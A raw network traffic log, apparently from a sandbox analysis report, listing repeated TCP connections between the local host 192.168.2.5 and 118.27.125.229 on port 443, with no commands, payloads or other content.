Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49701
Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49702
Source: global traffic	TCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49703
Source: global traffic	TCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49703
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49703
Source: global traffic	TCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49703
Source: global traffic	TCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49703
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49703
Source: global traffic	TCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49704
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49705
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49706
Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49706
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49706
Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49706
Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49706
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49706
Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49707
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49708
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49709
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
